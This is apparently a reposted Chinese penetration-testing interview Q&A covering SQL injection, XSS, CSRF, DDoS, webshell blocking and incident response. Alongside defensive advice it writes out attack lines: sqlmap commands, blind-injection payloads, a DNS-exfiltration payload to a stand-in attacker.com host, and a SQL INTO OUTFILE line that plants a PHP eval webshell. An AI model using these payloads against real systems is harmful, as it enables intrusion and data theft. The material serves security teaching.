当前位置: 首页 > news >正文

2025年渗透测试面试题总结-2025年HW(护网面试) 73(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 2025年HW(护网面试) 73

1. HTTP Referer

2. SQLMap扫POST注入与批量扫描

3. SQL注入盲注与Getshell

4. XSS原理与防御

5. CSRF防御

6. DDoS原理

7. 阻断Webshell连接

8. 文件上传漏洞

9. 常用漏扫工具

10. 端口防护与入侵响应

11. 渗透测试流程

12. TCP/IP四层模型

13. 查看Linux服务

14. SSH日志位置

15. 查看用户信息

16. NAT两种常用模式

17. 应急响应流程

 2025年HW(护网面试) 73

1、说一下http referer
2、sqlmap如何扫post注入,如何批量扫描?
3、sql注入了解吗?盲注流程讲一下,除了sleep函数还有什么?如何getshell?
4、xss的原理,如何防御?
5、csrf的防御
6、ddos的原理
7、webshell已经上传如何禁止菜刀等工具连接
8、讲一下文件上传
9、使用过哪些漏扫工具
10、一个互联网网站端口如何防护,发现入侵如何解决?
11、渗透测试流程
12、TCP/IP四层模型是哪四层
13、linux查看某个服务
14、linux ssh日志放在哪个目录
15、如何查看用户?
16、nat常用的两种模式
17、应急响应

1. HTTP Referer

HTTP Referer(正确拼写应为Referrer,历史拼写错误被保留)是请求头字段,表示请求来源页面的URL。
核心作用

  • 防盗链:阻止非本站域名引用资源(如图片)
  • 安全审计:追踪CSRF攻击源头
  • 流量分析:统计用户跳转路径
    隐私限制
    • 浏览器可配置不发送Referer(如设置Referrer-Policy: no-referrer
    • HTTPS→HTTP请求时Referer会被剥离

2. SQLMap扫POST注入与批量扫描

POST注入扫描

bashsqlmap -u "http://target.com/login" --data="username=test&password=test" 

关键参数

  • --data:POST数据
  • --method POST:指定请求方式
  • --proxy=http://127.0.0.1:8080:代理到BurpSuite分析

批量扫描

  1. 创建目标文件(targets.txt ):
    http://site1.com/login   
    http://site2.com/search   
    
  2. 执行批量扫描:
    bashsqlmap -m targets.txt --batch # --batch自动选择默认选项 

优化技巧

  • 结合--threads 5提升并发效率
  • 使用--scope过滤域名(如--scope "\.example\.com"

3. SQL注入盲注与Getshell

盲注流程(以布尔盲注为例):

  1. 探测注入点id=1' and 1=1--+(正常) vs id=1' and 1=2--+(异常)
  2. 猜解数据库名
    sqland (select substr(database(),1,1))='a' -- 逐字符爆破 
  3. 提取表数据
    sqland (select ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>100 

Sleep替代方案

  • 响应时间盲注benchmark(10000000,md5('test'))(CPU延时)
  • DNS外带load_file(concat('\\\\',(select database()),'.attacker.com\\test'))
  • 错误回显updatexml(1,concat(0x7e,(version())),1)

Getshell方法

  1. 写Webshell:
    sqlSELECT '<?php @eval($_POST["cmd"]);?>' INTO OUTFILE '/var/www/html/shell.php' 
    前提
    • 绝对路径已知
    • secure_file_priv为空
    • Web目录有写权限

4. XSS原理与防御

攻击原理
恶意脚本注入到网页中,浏览器解析执行(如<script>alert(1)</script>)。
防御方案

层别措施示例工具/代码
输入过滤转义特殊字符htmlspecialchars($str)(PHP)
输出编码按上下文编码(HTML/JS/URL)OWASP Java Encoder Project
CSP策略限制脚本源Content-Security-Policy: default-src 'self'
HttpOnly阻止JS访问CookieSet-Cookie: session=123; HttpOnly

5. CSRF防御

三重防护

  1. Token验证:表单添加随机Token(服务器校验)
    html<input type="hidden" name="csrf_token" value="{random_token}"> 
  2. SameSite Cookie
    httpSet-Cookie: session=abc; SameSite=Lax // 或Strict 
  3. 关键操作二次验证:密码/短信确认

6. DDoS原理

攻击本质:耗尽目标资源(带宽、连接数、CPU)
常见类型

类型攻击层案例
流量型(Volumetric)网络层UDP Flood、ICMP Flood
协议型(Protocol)传输层SYN Flood、Ping of Death
应用层(Application)应用层HTTP Flood、Slowloris

7. 阻断Webshell连接

四步应急响应

  1. 隔离主机:防火墙阻断出站(防止反弹Shell)
  2. 删除恶意文件
    bashfind /var/www -name "*.jsp" -mtime -1 -delete # 清理新增可疑文件 
  3. 阻断工具指纹
    • WAF/IPS添加规则:拦截User-Agent含C(菜刀特征)的请求
  4. 加固服务器
    • 禁用危险函数(PHP中disable_functions=system,passthru
    • 限制Web目录执行权限:chmod -R 755 /var/www

8. 文件上传漏洞

攻击方式

  • 后缀绕过.php5.phtml
  • Content-Type伪造image/jpeg
  • 文件头伪造:GIF89a头+PHP代码
  • 竞争条件:上传临时文件时快速访问

防御方案

mermaidgraph LR A[文件上传] --> B[后缀白名单] A --> C[文件头校验] A --> D[重命名文件] A --> E[存储到非Web目录] A --> F[图片二次渲染] 

9. 常用漏扫工具

工具类型场景
Nessus综合漏洞扫描网络设备/系统漏洞
Burp Suite ProWeb应用扫描API测试/XSS验证
OpenVAS开源替代Nessus低成本基础扫描
Nuclei定制化POC扫描快速检测0day
WPScan专项扫描WordPress漏洞

10. 端口防护与入侵响应

端口防护

  • 最小化暴露:防火墙仅开放80/443
  • 端口伪装:修改SSH默认端口(/etc/ssh/sshd_config
  • 网络隔离:DB服务器仅允许App服务器IP访问

入侵响应流程

  1. 取证:备份内存+磁盘镜像
  2. 溯源
    • 查询命令历史:history | grep -E 'wget|curl'
    • 分析进程树:pstree -p
  3. 清除后门:检查定时任务、authorized_keys文件
  4. 修复漏洞:升级软件/打补丁

11. 渗透测试流程

标准PTES阶段

  1. 情报收集:Whois/子域名/端口扫描
  2. 威胁建模:绘制攻击面(如OWASP Threat Dragon)
  3. 漏洞分析:结合手动+自动化工具
  4. 漏洞利用:获取Shell/数据
  5. 后渗透:权限提升/横向移动
  6. 报告输出:风险评级+修复建议

12. TCP/IP四层模型

层级功能协议举例
网络接口层物理传输Ethernet, WiFi
网际层寻址与路由IP, ICMP
传输层端到端通信TCP, UDP
应用层应用程序服务HTTP, FTP, DNS

13. 查看Linux服务

方法汇总

bashsystemctl list-units --type=service # systemd系统 service --status-all # SysVinit系统 ps -aux | grep nginx # 进程级检查 

14. SSH日志位置

  • 认证日志/var/log/auth.log (Debian/Ubuntu)
  • 安全日志/var/log/secure(CentOS/RHEL)
    关键命令
bashgrep 'Failed password' /var/log/auth.log # 检查暴力破解 

15. 查看用户信息

bashid root # 指定用户信息 cat /etc/passwd # 所有用户列表 lastlog # 最近登录记录 w # 当前登录用户 

16. NAT两种常用模式

模式原理应用场景
SNAT (源NAT)修改源IP,内网→外网企业共享上网
DNAT (目的NAT)修改目标IP,外网访问内网服务端口映射(如Web)

17. 应急响应流程

PDCERF模型

  1. 准备(Preparation)
    • 工具包:镜像工具(DD)/内存取证(Volatility)
  2. 检测(Detection)
    • 告警分析:HIDS/SIEM异常(如root用户非办公时段登录)
  3. 遏制(Containment)
    • 离线隔离:拔网线 > 防火墙封IP
  4. 根除(Eradication)
    • 清除持久化:检查crontab.ssh/authorized_keys
  5. 恢复(Recovery)
    • 重建系统:从洁净备份还原
  6. 跟进(Follow-up)
    • 复盘报告:根本原因分析(如弱密码导致入侵)
http://www.dtcms.com/a/301161.html

相关文章:

  • PDF文件被加密限制怎么办?专业级解除方案分享
  • mysql 快速上手
  • FFmpeg——参数详解
  • 3.JDK+JRE组件构成与协作
  • LeetCode 923.多重三数之和
  • 【AI论文】WebShaper:通过信息寻求形式化实现主动式数据合成
  • CIFAR100数据集实测-基于 AlexNet模型的压缩/Bagging/Boosting 探索
  • 创建的springboot工程java文件夹下还是文件夹而不是包
  • 大数据之路:阿里巴巴大数据实践——大数据领域建模综述
  • 卷积神经网络研讨
  • haproxy七层代理(知识点+相关实验部署)
  • 【奔跑吧!Linux 内核(第二版)】第5章:内核模块
  • 关系与逻辑运算 —— 寄存器操作的 “入门钥匙”
  • Linux: 调试器gdb/cgdb
  • 第六章 JavaScript 互操(2).NET调用JS
  • K-近邻算法
  • MPLS LDP(概念)
  • 20250707-2-Kubernetes 网络-Ingress暴露应用(http与https)_笔记
  • Flink窗口:解锁流计算的秘密武器
  • JavaEE初阶第十二期:解锁多线程,从 “单车道” 到 “高速公路” 的编程升级(十)
  • KingbaseES聚焦产品上线
  • 卫星图像语义分割与区域相似度比较研究
  • 顺序表算法题
  • 【自动化运维神器Ansible】Ansible常用模块之hostname模块详解
  • Qt C++动态库SDK在Visual Studio 2022使用(C++/C#版本)
  • ae烟雾-分形杂色
  • Python——入门
  • 金融科技里的信用评分、指纹识别、面部识别、虹膜识别
  • 地震成果数据在线可视化功能实现之高级篇
  • 枚举中间位置基础篇